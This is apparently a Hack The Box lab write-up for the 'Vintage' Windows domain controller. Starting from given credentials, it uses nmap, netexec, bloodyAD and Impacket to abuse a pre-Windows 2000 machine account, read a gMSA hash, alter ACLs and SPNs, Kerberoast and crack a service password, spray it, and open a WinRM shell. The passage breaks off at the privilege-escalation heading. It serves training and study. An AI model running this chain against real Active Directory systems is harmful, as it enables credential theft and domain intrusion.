HTB | Vintage

Machine - https://app.hackthebox.com/machines/Vintage

IP - 10.10.11.45

Machine Information - As is common in real life Windows pentests, you will start the Vintage box with credentials for the following account: P.Rosa / Rosaisbest123

NMAP

└─$ nmap -sT -p- --min-rate 10000 10.10.11.45 -Pn -oA nmap_ports                                                                                                              
Starting Nmap 7.95 ( <https://nmap.org> ) at 2025-07-25 19:08 IST
Nmap scan report for 10.10.11.45
Host is up (0.85s latency).
Not shown: 65516 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49664/tcp open  unknown
49668/tcp open  unknown
49674/tcp open  unknown
49685/tcp open  unknown
56155/tcp open  unknown
56230/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 273.80 seconds

└─$ nmap -sC -sV -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49664,49668,49674,49685,56155,56230 10.10.11.45 -Pn -oA nmap_port_details
Starting Nmap 7.95 ( <https://nmap.org> ) at 2025-07-25 19:16 IST
Nmap scan report for 10.10.11.45
Host is up (0.60s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-07-25 13:46:52Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: vintage.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: vintage.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49674/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49685/tcp open  msrpc         Microsoft Windows RPC
56155/tcp open  msrpc         Microsoft Windows RPC
56230/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: -2s
| smb2-time: 
|   date: 2025-07-25T13:47:50
|_  start_date: N/A

Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 133.47 seconds

SMB

└─$ netexec smb 10.10.11.45 -u 'P.Rosa' -p 'Rosaisbest123'                                                                                        
SMB         10.10.11.45     445    10.10.11.45      [*]  x64 (name:10.10.11.45) (domain:10.10.11.45) (signing:True) (SMBv1:False) (NTLM:False)
SMB         10.10.11.45     445    10.10.11.45      [-] 10.10.11.45\\P.Rosa:Rosaisbest123 STATUS_NOT_SUPPORTED 

(NTLM:False) shows that NTLM auth is disabled. I’ll try with Kerberos and it works:

└─$ impacket-getTGT vintage.htb/'P.Rosa':'Rosaisbest123'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in P.Rosa.ccache

┌──(anurag㉿anurag)-[~/htb/Vintage]
└─$ cat krb5.conf  
[libdefaults]
    dns_lookup_kdc = false
    dns_lookup_realm = false
    default_realm = VINTAGE.HTB

[realms]
    VINTAGE.HTB = {
        kdc = dc01.vintage.htb
        admin_server = dc01.vintage.htb
        default_domain = vintage.htb
    }

[domain_realm]
    .vintage.htb = VINTAGE.HTB
    vintage.htb = VINTAGE.HTB
                                                                                                                                                                                                                                                                             
┌──(anurag㉿anurag)-[~/htb/Vintage]
└─$ export KRB5_CONFIG=./krb5.conf
                                                                                                                                                                                                                                                                             
┌──(anurag㉿anurag)-[~/htb/Vintage]
└─$ export KRB5CCNAME=P.Rosa.ccache
                                                                                                                                                                                                                                                                             
┌──(anurag㉿anurag)-[~/htb/Vintage]
└─$ netexec smb dc01.vintage.htb -u 'P.Rosa' -p 'Rosaisbest123' -k
SMB         dc01.vintage.htb 445    dc01             [*]  x64 (name:dc01) (domain:vintage.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB         dc01.vintage.htb 445    dc01             [+] vintage.htb\\P.Rosa:Rosaisbest123 

enum shares

└─$ netexec smb dc01.vintage.htb -u 'P.Rosa' -p 'Rosaisbest123' -k --shares
SMB         dc01.vintage.htb 445    dc01             [*]  x64 (name:dc01) (domain:vintage.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB         dc01.vintage.htb 445    dc01             [+] vintage.htb\\P.Rosa:Rosaisbest123 
SMB         dc01.vintage.htb 445    dc01             [*] Enumerated shares
SMB         dc01.vintage.htb 445    dc01             Share           Permissions     Remark
SMB         dc01.vintage.htb 445    dc01             -----           -----------     ------
SMB         dc01.vintage.htb 445    dc01             ADMIN$                          Remote Admin
SMB         dc01.vintage.htb 445    dc01             C$                              Default share
SMB         dc01.vintage.htb 445    dc01             IPC$            READ            Remote IPC
SMB         dc01.vintage.htb 445    dc01             NETLOGON        READ            Logon server share 
SMB         dc01.vintage.htb 445    dc01             SYSVOL          READ            Logon server share 

We can also get the users list

└─$ netexec smb dc01.vintage.htb -u 'P.Rosa' -p 'Rosaisbest123' -k --users 
SMB         dc01.vintage.htb 445    dc01             [*]  x64 (name:dc01) (domain:vintage.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB         dc01.vintage.htb 445    dc01             [+] vintage.htb\\P.Rosa:Rosaisbest123 
SMB         dc01.vintage.htb 445    dc01             -Username-                    -Last PW Set-       -BadPW- -Description-                                               
SMB         dc01.vintage.htb 445    dc01             Administrator                 2024-06-08 11:34:54 0       Built-in account for administering the computer/domain 
SMB         dc01.vintage.htb 445    dc01             Guest                         2024-11-13 14:16:53 0       Built-in account for guest access to the computer/domain 
SMB         dc01.vintage.htb 445    dc01             krbtgt                        2024-06-05 10:27:35 0       Key Distribution Center Service Account 
SMB         dc01.vintage.htb 445    dc01             M.Rossi                       2024-06-05 13:31:08 0        
SMB         dc01.vintage.htb 445    dc01             R.Verdi                       2024-06-05 13:31:08 0        
SMB         dc01.vintage.htb 445    dc01             L.Bianchi                     2024-06-05 13:31:08 0        
SMB         dc01.vintage.htb 445    dc01             G.Viola                       2024-06-05 13:31:08 0        
SMB         dc01.vintage.htb 445    dc01             C.Neri                        2024-06-05 21:08:13 0        
SMB         dc01.vintage.htb 445    dc01             P.Rosa                        2024-11-06 12:27:16 0        
SMB         dc01.vintage.htb 445    dc01             svc_sql                       2025-07-25 14:52:08 0        
SMB         dc01.vintage.htb 445    dc01             svc_ldap                      2024-06-06 13:45:27 0        
SMB         dc01.vintage.htb 445    dc01             svc_ark                       2024-06-06 13:45:27 0        
SMB         dc01.vintage.htb 445    dc01             C.Neri_adm                    2024-06-07 10:54:14 0        
SMB         dc01.vintage.htb 445    dc01             L.Bianchi_adm                 2024-11-26 11:40:30 0        
SMB         dc01.vintage.htb 445    dc01             [*] Enumerated 14 local users: VINTAGE

Bloodhound

─$ bloodhound-python -u 'P.Rosa' -p 'Rosaisbest123' -d vintage.htb -ns 10.10.11.45 -c All --zip              
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: vintage.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.vintage.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: dc01.vintage.htb
INFO: Found 16 users
INFO: Found 58 groups
INFO: Found 2 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: FS01.vintage.htb
INFO: Querying computer: dc01.vintage.htb
WARNING: Could not resolve: FS01.vintage.htb: The DNS query name does not exist: FS01.vintage.htb.
INFO: Done in 01M 28S
INFO: Compressing output into 20250725203416_bloodhound.zip

Interestingly there are two computers

Foothold/ Shell

Shell as C.Neri

Weak Permission Pre2K

On looking at FS01$ we found that FS01.VINTAGE@HTB -> MemberOf -> PRE-WINDOWS 2000 COMPATIBLE ACCESS@VINTAGE.HTB

When a new computer account is configured as "pre-Windows 2000 computer", its password is set based on its name (i.e. lowercase computer name without the trailing $). When it isn't, the password is randomly generated.

Let’s try to authenticate via fs01 as password

└─$ netexec ldap vintage.htb -u 'FS01$' -p 'fs01' -k        
LDAP        vintage.htb     389    DC01             [*] None (name:DC01) (domain:vintage.htb)
LDAP        vintage.htb     389    DC01             [+] vintage.htb\\FS01$:fs01

bingo!!! It worked

Auth as GMSA01$

FS01.VINTAGE@HTB -> MemberOf -> DOMAIN COMPUTERS@VINTAGE.HTB -> ReadGMSAPassword -> GMSA01$@VINTAGE.HTB

Let’s msDS-ManagedPassword of GMSA01$

└─$ kinit 'FS01$@VINTAGE.HTB'
Password for FS01$@VINTAGE.HTB: 

└─$ bloodyAD --host dc01.vintage.htb -d vintage.htb -u 'FS01$' -p 'fs01' -k get object --resolve-sd 'GMSA01$' --attr msDS-ManagedPassword 

distinguishedName: CN=gMSA01,CN=Managed Service Accounts,DC=vintage,DC=htb
msDS-ManagedPassword.NTLM: aad3b435b51404eeaad3b435b51404ee:5008d30496b4c5069ce1fc187b5b5960
msDS-ManagedPassword.B64ENCODED: bf1cBrHgnrALWx1WFDnvyHlBZcnkH+3VWYL4yBPdXcXgE7ENWHpWc03uhzxvXLrT5eh71spfFnajFbFuYuHCk2bczzZnBOeruwpF5vpYWmmULhBQoBvyxVWvr2MwOcHOyS7LQYMZdAlJ8k0Dg/2J3ie5SJFNM+Sb7M+Nx+zLSG3A7lYcdYcLS5ed0D8jw1TFB4g4+S0pqNRMjXp2b3HpJbHBFnn6wTDKrDiOZaG/DJHDODoCG0oAncE43Rtpf5lve49jd+m8QGqbQXmQEqCTH/CPS5/n6TKQgqzIMyE8LaxMK3s4UXJAbh8wlskq7j27jD61W7V0JMeMT/dvQu20Jg==

Let’s try to authenticate

└─$ netexec smb dc01.vintage.htb -u 'gmsa01$' -H '5008d30496b4c5069ce1fc187b5b5960' -k
SMB         dc01.vintage.htb 445    dc01             [*]  x64 (name:dc01) (domain:vintage.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB         dc01.vintage.htb 445    dc01             [+] vintage.htb\\gmsa01$:5008d30496b4c5069ce1fc187b5b5960 

GenericWrite / AddSelf

GMSA01$@VINTAGE.HTB -> GenericWrite/ AddSelf -> SERVICEMANAGERS@VINTAGE.HTB

Let’s GMSA01$@VINTAGE.HTB to SERVICEMANAGERS group

└─$ impacket-getTGT vintage.htb/'gmsa01$' -hashes :5008d30496b4c5069ce1fc187b5b5960 -dc-ip 10.10.11.45
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in gmsa01$.ccache

└─$ export KRB5CCNAME=gmsa01\\$.ccache 
                                                                                                                                                                                                                                                                              
┌──(anurag㉿anurag)-[~/htb/Vintage]
└─$ klist
Ticket cache: FILE:gmsa01$.ccache
Default principal: gmsa01$@VINTAGE.HTB

Valid starting     Expires            Service principal
07/25/25 21:17:53  07/26/25 07:17:53  krbtgt/VINTAGE.HTB@VINTAGE.HTB
        renew until 07/26/25 21:17:53
                                                                                                                                                                                                                                                                              
┌──(anurag㉿anurag)-[~/htb/Vintage]
└─$ bloodyAD --host dc01.vintage.htb -d vintage.htb  -k add groupMember SERVICEMANAGERS 'gmsa01$'
[+] gmsa01$ added to SERVICEMANAGERS

GenericAll

SERVICEMANAGERS@VINTAGE.HTB -> GenericAll -> SVC_ARK@VINTAGE.HTB / SVC_LDAP@VINTAGE.HTB / SVC_SQL@VINTAGE.HTB

Targeted Kerberoasting on SVC_SQL

We can try Targeted Kerberoasting on SVC_*, but first, we need to enable SVC_SQL@VINTAGE.HTB

remember to get a new TGT for GSMA01$

└─$ bloodyAD --host dc01.vintage.htb -d vintage.htb  -k remove uac svc_sql -f ACCOUNTDISABLE          
[-] ['ACCOUNTDISABLE'] property flags removed from svc_sql's userAccountControl

for targeted Kerberoasting, I need to set SPN

└─$ bloodyAD -d vintage.htb -k --host dc01.vintage.htb -u 'GMSA01$' -p 5008d30496b4c5069ce1fc187b5b5960 -f rc4 set object svc_ldap servicePrincipalName -v 'http/whateverldap'
[+] svc_ldap's servicePrincipalName has been updated
                                                                                                                                                                                                                                                                              
┌──(anurag㉿anurag)-[~/htb/Vintage]
└─$ bloodyAD -d vintage.htb -k --host dc01.vintage.htb -u 'GMSA01$' -p 5008d30496b4c5069ce1fc187b5b5960 -f rc4 set object svc_ark servicePrincipalName -v 'http/whateverark'
[+] svc_ark's servicePrincipalName has been updated
                                                                                                                                                                                                                                                                              
┌──(anurag㉿anurag)-[~/htb/Vintage]
└─$ bloodyAD -d vintage.htb -k --host dc01.vintage.htb -u 'GMSA01$' -p 5008d30496b4c5069ce1fc187b5b5960 -f rc4 set object svc_sql servicePrincipalName -v 'http/whateversql'  
[+] svc_sql's servicePrincipalName has been updated

Now let’s perform Taregeted Kerberoasting

└─$ netexec ldap dc01.vintage.htb -u 'gmsa01$' -H '5008d30496b4c5069ce1fc187b5b5960' -k --kerberoasting kerberoast.txt
LDAP        dc01.vintage.htb 389    DC01             [*] None (name:DC01) (domain:vintage.htb)
LDAP        dc01.vintage.htb 389    DC01             [+] vintage.htb\\gmsa01$:5008d30496b4c5069ce1fc187b5b5960 
LDAP        dc01.vintage.htb 389    DC01             [*] Skipping disabled account: krbtgt
LDAP        dc01.vintage.htb 389    DC01             [*] Total of records returned 3
LDAP        dc01.vintage.htb 389    DC01             [*] sAMAccountName: svc_ark, memberOf: CN=ServiceAccounts,OU=Pre-Migration,DC=vintage,DC=htb, pwdLastSet: 2024-06-06 19:15:27.913095, lastLogon: <never>
LDAP        dc01.vintage.htb 389    DC01             $krb5tgs$23$*svc_ark$VINTAGE.HTB$vintage.htb\\svc_ark*$54f5294d4c8ae1547c011a83cb69c460$db3dab3c040181767226c5ef793cdec183612ebef7189306183898dd9e777172a2930fd6befab85857de9ca7c5a7bc5697a555d35b227bd1e5056a1fa14215f7a7980df3715e365a590c536f13b1420bf7180fd6148764cf85b25094e5cfc57314feecd460d6bf3723cfd1d30e14726790b866e15db5e2a650dfb579056f133fae4fea01af2b9234b2db04411f729e93e651f40175076dfe3b977b6196c85c338daafb129c9f25d13d013c94308cdc43802fe67eda41f0596ada5b2557d378330b225a4db1829035798bdd7f363b050b27548b9b9da9f84bc55a32a5c1fd659b1a2d7f45b76f6435b56e626579e906d9b8ae18f18c86fe2f0da671fae00c892ef195989cd5e3a8d32d211313f6ffe2094a37cb396abcd97c73bf8b226c3e1ef4bf0bce69c821183d477669d1adbd6ae0d9e8b1b27e2856d20cbf56ade48a237a6551f855bd8547f6d6499fd8ca6973847f3950740eaba8a6c4a0877e9537b22550c515cdacad339f563b69abe3eb01d6aa97df9b736c20db5bc2c1e3bd50c6a4e1955f51a6b57acd242ed45a38e065cae9fed453302d821805038c98a91ebefb0af2d300c5e8756c9bd3a970e78540b14be66a19c571a68ddaf8221945290ae6a0552ce93481f3828d5c3baf4e3ea73d96f6431977216ac49a67d165e123e443589bde370faf2713fcea1673ceb27affff74e0308280e5a04d0f9b6000d758ef28325730bd0948f2560992ed57ecc982b9f9eb323b4259dbe0928354f239a9c2779214412a78f07e9cd22c216f40fd327b96467b49077248d6045b46539d546d92a39527935a92505f3881c57dc799e4bb3e053fbb39ae90291e04559966115779c819b054dd73896f83447b07e408ee4e2d23ba1938f1ee0c33120c59492f518df56ae5587ae42afe6fb008107e75ccc83bfd97d90bba29f0cac02f9f371eb7edc2842a1c36dbc67178326b9c6d04b5ed3d749b48e3f49782041a90b2cdaac2948aa516a03f8f2c64509e2fb5bffa7ac558d75a31406997224ce6a7f5c733b105cd3b88320084e87a871a9078c71c802eb659043ad071d05dea7f38b01a5fa105f08fcfbbf8f3862f930169e0ca6633937d6baa00a2dd0d399c96828380fdf1ad3cf6c36951e449cb1e515b35f8f84356dba785f215b4599b0a3edbc35e850248ad85ace4c7e9d05053efa7393b83ae55546c02d2124664a0b6547a56f7009e217848fa1d37879026f682d94a55c73a84cb287e6512a68fa64ac4fd2cff54b0297df47d6b44bda4ddf0bd5fd81d07952856f339e96873fdc008dcc68ac4685f0e7f38fe1f3629a7512c68b3cb4b684d9564694179ed5ed032f52afdbe6f7f55fdd8c7f898dce9ed2f6409347100cb15d97be28a126921dbcc35e5b92544b98939904f1d054706af5a90ae0a729edfb1f56b517b125e1d9dfdd05f95b722266982e56f                                                                                                                                                                                                                                            
LDAP        dc01.vintage.htb 389    DC01             [*] sAMAccountName: svc_ldap, memberOf: CN=ServiceAccounts,OU=Pre-Migration,DC=vintage,DC=htb, pwdLastSet: 2024-06-06 19:15:27.881830, lastLogon: <never>
LDAP        dc01.vintage.htb 389    DC01             $krb5tgs$23$*svc_ldap$VINTAGE.HTB$vintage.htb\\svc_ldap*$e2b1d9ae89f51f33ff6d6d77df159c46$2ceaac10aa07015d6f2f5fff4c2b3da0b96e6d727ad68a72cee8a64e2dfcc8ce7c6adc0e2ed3a3287b80e75040229317de11f812b540fa312ec627edfd7459a1510d42664a89333f038db14c0430af57435392ebb60a74b46efc94ec2934b299ef010a185bf31f9735999fa47155caf319e4c1ac3af7f6ce72bd174dc5c3db547ebfa0c9231698b3cdd253c24dc51f35ed9a8411c490377bd331eb30c04bd486548db18810957d6991fb9e5256aac136207e1f7cb993681e9401df0869de0222cf3e984601b3b74b022787dcc02c426b9c1d86e7cbce44743cb830838a561c3017950d6128c8dfee525f3f6d1832e4a6c18e822fcadf2c5e51ec9494b3d50e4be8ff01924a0c22a6cd5b0922bd2fbb791727295284821d348bbc8fb27c17d54ae1adb3bb66d5380fbef506f8a7b6a639db83e8f37097e7dd29f2cf5b4cde02278b2494ec1819a398a6cea276c373392ecd91b9bc5ceea773c7cc9f70f3cb8f7066403437a4cd0db1bdacbb7bcef5a489119374903eb6d8eae78fea909cf7fb15cd566788fac7dcb74ac9ca280882e6cfae4b21a7e574980b95207ea067dbf300dfd2a98282a3bce7323a34b22566c8c70b0120d146871110db8569fb395d5eb2b31e78d29bb6bce90e4b16dc72392f89ecf64c0a6dd1abf2fd7a80417cef770f0c7cf5590d700fab4f0d9e64aa149512197443060a52fb9f9e80cc6c07f658e3713741553a5a998eeb49c7a1e0d68c02d255b66eeb4fcb2110872c8872913a0231314b8e878ab8798ceecf2e5754449f2cb6e8ce9efcc5438ca2e47fd9e964d0b6ec5fd2d4fdc698efa5e990e1f52d54b170bd585b2c87cdfc2c1020805cfc675d5bfb670a0aa41de062dd5fa29251311b97ffd89355c493b47536d580c7ff4ef03d2d19fdbaf804bea34012c1cb85630bed1cf473652b8716e35320eb279a09ea809ddebaf6d7f40f74c5e8ca01f87a4ed724fda70a6f7acb8522d31b3595d1497ba2fbacca671522e218448f47401f7c16ab1a3ab6ae1ee8f7a1157e70d4c3c2c7aa284e955b7a7cfae2c5dd2e1d6e944427df5dea44b6c29e8c02bd909691d8ef983bf833b725cf8594e9fdd63a1b92d552613d0b4e8802d9291d34bc74cf513deeaa87616f1cfb023f7b4122c65bc8d593f7a806108f7ea5ef1c907e4787b2ae673b39a6e43bb9ce1abf69f5f4b94c22715cc497fd9eabbe840130c8346ed80e00ae908e37b8977b640352e225a2f53a8616befc2c185250b5d0d8b9630532f37355ad70733b235beaded6d37b703ce4df2bfb50cddc5ec408193c570e316473a0ef8a67ff811611c1b100be53cc1afca62209878bdb5cb116e2c05fe0cb76b25faea9794b9b53125c6da1dd17927bf144322316c18f0472e30d21005213686538b0a90857a8d7321359e853cdf50cb6696d79d53e2efc9eed323252b483b65477                                                                                                                                                                                                                                          
LDAP        dc01.vintage.htb 389    DC01             [*] sAMAccountName: svc_sql, memberOf: CN=ServiceAccounts,OU=Pre-Migration,DC=vintage,DC=htb, pwdLastSet: 2025-07-25 22:02:06.141659, lastLogon: <never>
LDAP        dc01.vintage.htb 389    DC01             $krb5tgs$23$*svc_sql$VINTAGE.HTB$vintage.htb\\svc_sql*$1de69c066d2b07799d11b3bf8e6568d2$26ace3e63f68ddebefbc0d37b3f934219bfd29bbc5b7fb78d94a4d4851df5d982670985b966c2db84dea2570203ac109cb771f3819d07e21a836f7644c87964b689f9522453c31c8c3dd70f002fd6dc79e0b39f3dea132566215f1d37b7b5e85ef8ccfd56cc47da0180e2d8e4b70c9bb1cf471f648b8f7e18807a26b5d5d1ff0175285875164d3d74adf75b1ccb364460524fd9e8f9993cc9d72ce702274f80b2888da9aa153bc072b460914c040c2fa953036f091c6a5c55b90e32610210aa5b9c5be427bffef716b8f3be77d38f907e9e3bbc245b88066cc1388bde4f22881307628123ec6eaaf5d2ef5bf379889a50e411bdb917196f0ffb46ca64603078f97bdc621deb699f31e8abf400dbc1f64f5c6834118af33e7f82d8ec54b883f1c42c3438b4668b829bef18c65d15ef8f7c6ba420fb60b2fe5786d79e25b1632e370799b922fa52e22bb85a755f1dc5007833ecf3c5c691626bdfafcab24f25325e7488360ea3e5c3fe0813227d023bb102a6f6384f1a4aee51bd9f0385511a0b0f2959139fed418e832f93d613fa4865aae7a64fc3d2520c11e0073006763b766ce26a82f9ca75209cb7eb5718a98215aa5b0e9db1c167c34cf8bb7087754976cab4d4341c57353569fc66e35542b42b73a5a49e5fe9ce8c8e300c852f6c61f60af3c9c66042d243b6125cde1c53b99961ef8e66625d0e931b84bc2567d68acbf8bcf23c12cc210d4b9e637c7cdfd0b55e4cdf22a4abe5c36cff0ef5cab949b5baab869169b791a666ba4290df58b4b56045b88bd9a1b348241b8a1e85348dcc4dbab16f1e1112cc3fb853bd517759d05beed5ddb430420acbba2c20e815b5c11bc6f58f05ccdec0003198df2596a7169300d809861befc2e17efda448ddfe85f2193114809073bcc38e01f688584a03e6c770565dfe932d84570cf0785c89488d55b82a4273e8d2ded7adeac89e40a8ac88b03bae44bbd793e064a4215e4d667c3bfad49969b2fc640cfdb76bb37ac917cfeebe7ea3cf324338fdb1dc6f2f950eec9fd415dda5e05bab381e568954d4956b8b5a541ce81c1f7fea74898a0252b63011e0d812de65f6ac9d3eccd6eb03795da3622784b3f837ebdd66047dd32711e720b3b19d9794026eda7d9be2d1a36e36fedc12857d6a839f974c65e1b1dd01bd12b7cba1a68bb72a62554f817f5381d1b3483f9391e4b988840d2528afb5071baa63170a3ceae1bd309b21f2b6f880cc30b6f62552c5740e4ba0a92e9501779ebe17eabc21d821f63ab043b1a43fe2d9c07393695ad954fdb98cb596956b92c2246c94b85e1145561c951cb627129b656b124be9fc877201e608b3e2fdf453c36b98ef8f4adf6add1d0f545abd3cf99b753eec0882471130f345e4f361ee81102fa692082db10dc825113d90c64ac0add6a1a3d2a75314d78605017f3ac69fc668e        

Crack the Hash

Let’s try to crack the hash

└─$ hashcat kerberoast.txt /home/anurag/stuff/rockyou.txt 

<--SNIP-->

$krb5tgs$23$*svc_sql$VINTAGE.HTB$vintage.htb\\svc_sql*$d7f53301a490c2bed7a1e92e7c3fd184$a3ebf628f3d2637825921a66422f05018666d441e1a716c63e34f8fddaf161b65e827e2214a4c3cd37e165c0ff060119ca79ee3eb28985dd3845e44c7f60a4d7dba64312b61ddbdfd2f63ff0e12e8861b740aba480e53926f67dfdfbb8d4970814085b5a359bbd4273667311e4d4f6be1527c989d5f743be69893c3dde6646cca3e4bbe58019c7ee85e8f1de9e753a63f39563373e62067556b9201dd2b59709f9b5a72fe702b83023cafa765bb7a8c294a1dacb2e3c2fd48ff25809850f979ce2d9394bfb49566c9308ed63b18c4ea4ecf11c89a2b045945ea2bdb1396bdfdfcb9bad3e54f33a4c733477fc0426d18191a98c75dc05c87e990fb76f8442471b69e6a9be7c91e738efcb8dacf7008ef3a4accba0b6777cfc15778143a385d1ce708eca4ab4f9b68fd2c74003019d21b9ac02bb163e90d9ae9383d6b05d821e8ac4699a14e74ff37d375bb5003ccc79c0277557123befa6f7e0b8faa07d2d5369a6596947dec92bfdbd64e3f93da7a734bb782b32a182fa539970ff978c05ff5eee5ba5d564016f30bf9a7d5c148ce6fada042be8f10ab231cdf100ef35305f1d931e934abb3f64bef5c23c1c130318ac91bd2879e98c0d572ce71147747484bec99d50e4dda3803c9cb6329594e949f7d12f3540c751fd7fd604b2064443079d16fe98c30e67694727ac3768049ea73fe352f39cbdf13281840185bd85b7d53f4741f94ab3183fbdef12ace64f6df282464d008849e38d7c7c663b29af691807aa0a49ddd30b5002e526d2caf0e50442c27119e3634faed55c51e0cec362d6e4d2407bf1e338e1cce24e324e8e057ee078154b281a639467707105e9bd1651fbc7f50eb6da07ed5f1366109743351608f943d811e9bfbd1eda362bb8de27842a30058f273572872a9150a3d3d810f20462f69194fb9e0111329b1fdccc472da77cd68c7569e02bc1e71f9a88ba873a32094ba9155b9b68e655b3c528a7c30cfbf7c9274e3b32d350e28e5bdb56b255d6309e13bfd38b379f7be57879f72c131699edf89632f071b0d835ecb7efc133e11908adc7ab0de3dcb0c31ea4fbf7104e889f3968b8899ad94f8ea43a951aaf38421408a5a93aa141a0bfb3a66d67cdb5b8ad101b672100cbbaac9c2ce6f52cbc54ece0749a0d810cbf865f5327d36216d13eb17124cb584fa4ce2fb2d4f83cea02d0bcb7081e89405ba770004b3c2b4f557604b921151231817175741ce3de64f87905c67e395ef330be5edef16ce2abe682f068275f535514d0d55afc616bea47e6d0615107a84eed3e3d12a13d9bcb95c1da76412b6f3a3522474a31cddfcd3d3dfaa4782c76bc6baec21c70d53c37a31274dcaff03d658f585bcbffd2ab6e6fa3ab1376ed0a959aa654997f38f0adcbdc66fe2e864454ce189074700917c65ac8c88b47fa19b364613ba801bdfd727cf400:Zer0the0ne

<--SNIP-->

found sql_svc password

└─$ netexec smb dc01.vintage.htb -u svc_sql -p 'Zer0the0ne' -k
SMB         dc01.vintage.htb 445    dc01             [*]  x64 (name:dc01) (domain:vintage.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB         dc01.vintage.htb 445    dc01             [+] vintage.htb\\svc_sql:Zer0the0ne 

passwordspray

Let’s password spray the password of svc_sql for users we got earlier

└─$ netexec smb dc01.vintage.htb -u users.txt -p Zer0the0ne -k --continue-on-success
SMB         dc01.vintage.htb 445    dc01             [*]  x64 (name:dc01) (domain:vintage.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB         dc01.vintage.htb 445    dc01             [-] vintage.htb\\L.Bianchi_adm:Zer0the0ne KDC_ERR_PREAUTH_FAILED 
SMB         dc01.vintage.htb 445    dc01             [-] vintage.htb\\gMSA01$:Zer0the0ne KDC_ERR_PREAUTH_FAILED 
SMB         dc01.vintage.htb 445    dc01             [-] vintage.htb\\C.Neri_adm:Zer0the0ne KDC_ERR_PREAUTH_FAILED 
SMB         dc01.vintage.htb 445    dc01             [-] vintage.htb\\svc_ark:Zer0the0ne KDC_ERR_PREAUTH_FAILED 
SMB         dc01.vintage.htb 445    dc01             [-] vintage.htb\\svc_ldap:Zer0the0ne KDC_ERR_PREAUTH_FAILED 
SMB         dc01.vintage.htb 445    dc01             [+] vintage.htb\\svc_sql:Zer0the0ne 
SMB         dc01.vintage.htb 445    dc01             [-] vintage.htb\\P.Rosa:Zer0the0ne KDC_ERR_PREAUTH_FAILED 
SMB         dc01.vintage.htb 445    dc01             [-] vintage.htb\\krbtgt:Zer0the0ne KDC_ERR_CLIENT_REVOKED 
SMB         dc01.vintage.htb 445    dc01             [+] vintage.htb\\C.Neri:Zer0the0ne 
SMB         dc01.vintage.htb 445    dc01             [-] vintage.htb\\G.Viola:Zer0the0ne KDC_ERR_PREAUTH_FAILED 
SMB         dc01.vintage.htb 445    dc01             [-] vintage.htb\\R.Verdi:Zer0the0ne KDC_ERR_PREAUTH_FAILED 
SMB         dc01.vintage.htb 445    dc01             [-] vintage.htb\\Administrator:Zer0the0ne KDC_ERR_PREAUTH_FAILED 
SMB         dc01.vintage.htb 445    dc01             [-] vintage.htb\\L.Bianchi:Zer0the0ne KDC_ERR_PREAUTH_FAILED 
SMB         dc01.vintage.htb 445    dc01             [-] vintage.htb\\Guest:Zer0the0ne KDC_ERR_CLIENT_REVOKED 
SMB         dc01.vintage.htb 445    dc01             [-] vintage.htb\\M.Rossi:Zer0the0ne KDC_ERR_PREAUTH_FAILED 

We are in as C.Neri and got user.txt

└─$ kinit 'C.Neri@VINTAGE.HTB'
Password for C.Neri@VINTAGE.HTB: 
                                                                                                                                                                                                                                                                              
┌──(anurag㉿anurag)-[~/htb/Vintage]
└─$ evil-winrm -i dc01.vintage.htb -r vintage.htb
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: <https://github.com/Hackplayers/evil-winrm#Remote-path-completion>
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\\Users\\C.Neri\\Documents> dir C:\\Users\\C.neri\\Desktop\\

    Directory: C:\\Users\\C.neri\\Desktop

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----          6/7/2024   1:17 PM           2312 Microsoft Edge.lnk
-ar---         7/25/2025   3:36 PM             34 user.txt

Privilege Escalation

Shell as L.Bianchi_adm

DAPI

